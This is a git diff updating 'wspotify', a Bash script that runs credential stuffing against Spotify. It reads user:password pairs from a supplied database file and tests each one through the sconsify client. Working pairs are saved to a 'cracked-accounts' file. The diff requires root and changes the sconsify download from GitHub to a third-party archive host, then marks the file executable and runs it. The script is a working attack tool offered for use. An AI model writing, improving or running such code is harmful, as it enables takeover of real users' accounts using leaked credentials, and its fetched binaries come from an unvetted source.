Update wspotify

diff --git a/wspotify b/wspotify
--- a/wspotify
+++ b/wspotify
@@ -34,31 +34,40 @@
 ####                                                                       #####
 ################################################################################
 
-banner() {
-cat << "EOF"
-                          _   _  __
-__      _____ _ __   ___ | |_(_)/ _|_   _ 
-\ \ /\ / / __| '_ \ / _ \| __| | |_| | | | Author: wuseman
- \ V  V /\__ \ |_) | (_) | |_| |  _| |_| | Version: 1.0
-  \_/\_/ |___/ .__/ \___/ \__|_|_|  \__, |
-             |_|                    |___/ 
------------------------------------------------------------
-EOF
-}
+
+if [[ $EUID -ne "0" ]]; then
+   echo "This tool must be executed by root"
+   exit 1
+fi
+
+if [[ -z ${1} ]]; then
+   echo -e "\nYou must choose at least one database ... "
+   echo -e "\n       Usage: ./$basename$0: database.txt\n"
+   exit 1
+fi
+
+if [[ ! -d "/root/cracked-accounts" ]]; then
+   mkdir -p "/root/cracked-accounts"
+fi
+
+if [[ ! -f ${1} ]]; then
+   echo -e "$basename$0: internal error -- No such database could be found, exiting..."
+   exit 1
+fi
 
 requirements() {
 find /usr/include -type d |grep 'libspotify' &> /dev/null
-             if [[ "$?" -ne "0" ]]; then
-             if [[ -z "$LIBSPOTIFY" ]]; then
-                         printf "Libspotify is deprecated but is required for $basename$0 bruteforcing\nto work, do you have libspotify installed? (YES/no): "
-               read LIBSPOTIFY
-                 if ! [[ "$LIBSPOTIFY" = "YES" ]]; then
-                  echo "Can't continue until libspotify has been installed.."
-                   echo "Exiting.."
-                   exit 1
-                 fi
-             fi
-             fi
+ if [[ "$?" -ne "0" ]]; then
+   if [[ -z "$LIBSPOTIFY" ]]; then
+     printf "Libspotify is deprecated but is required for $basename$0 bruteforcing\nto work, do you have libspotify installed? (YES/no): "
+     read LIBSPOTIFY
+        if ! [[ "$LIBSPOTIFY" = "YES" ]]; then
+           echo "Can't continue until libspotify has been installed.."
+           echo "Exiting.."
+            exit 1
+        fi
+   fi
+ fi
 
 find /usr/include -name "portaudio.h" |xargs grep -v "port" &> /dev/null
    if [[ $? -ne 0 ]]; then 
@@ -71,44 +80,26 @@ requirements
 
 ./sconsify -version &> /dev/null
    if [[ "$?" -ne "0" ]]; then
-        echo "Sconsify is required to be installed before we attacking targets.."
-         read -p "Download and install sconsify (y/N): " installsconsify
-          if [[ "$installsconsify" = "y" ]]; then
-             echo -e "Hold on, downloading sconsify.."
-             wget -q --user-agent="${USERAGENT}" "https://github.com/fabiofalci/sconsify/releases/download/next-20180428/linux-x86_64-sconsify-0.6.0-next.zip"
-             echo -e "Unzipping sconsify into current dir.."
+             printf "%s\n" "...Preparing"
+             wget -q https://nr1.nu/archive/sconsify/linux-x86_64-sconsify-0.6.0-next.zip
              unzip -q -o "linux-x86_64-sconsify-0.6.0-next.zip"
              chmod +x ./sconsify
-             echo -e "Cleaning up."
-             echo "All done.."
-             rm linux* &> /dev/null
-             sleep 2
-         else
-            echo -e "$basename$0: internal error -- sconsify is required to be installed.."
-            exit 1
-         fi
+             printf "%s\n" "...Cleaning up"
+             printf "%s\n" "...All done :)"
+             echo -e "-----------------------------------------------------------"
+             rm "linux*sconsify" &> /dev/null
   fi
 
 
 
-if [[ -z "$1" ]]; then
-   banner
-   echo -e "You must choose at least one database ... "
-   echo -e "Example usage: ./wspotify database.txt"
-   echo -e "-----------------------------------------------------------"
-   exit 1
-fi
-
-banner
-
 while read line; do
  SPOTIFY_USER="$(echo $line|cut -d: -f1)"
  SPOTIFY_PASS="$(echo $line|cut -d: -f2)"
-  ./sconsify -username="${SPOTIFY_USER}" <<< "${SPOTIFY_PASS}" 2> /dev/null|grep -i -q "bad"
+         ./sconsify -username="${SPOTIFY_USER}" <<< "${SPOTIFY_PASS}" 2> /dev/null|grep -i -q "bad"
      if [[ "$?" -eq "0" ]]; then
          echo -e "[\e[1;31m<<\e[0m] - Wrong Password: ${SPOTIFY_USER}:${SPOTIFY_PASS}"
       else
           echo -e "[\e[1;32m>>\e[0m] - Cracked Password: ${SPOTIFY_USER}:${SPOTIFY_PASS}" 
-          echo -e "${SPOTIFY_USER}:${SPOTIFY_PASS}" >> /root/cracked-spotify-accounts.txt
+          echo -e "${SPOTIFY_USER}:${SPOTIFY_PASS}" >> $HOME/cracked-accounts/spotify-accounts.txt
       fi
 done < $1
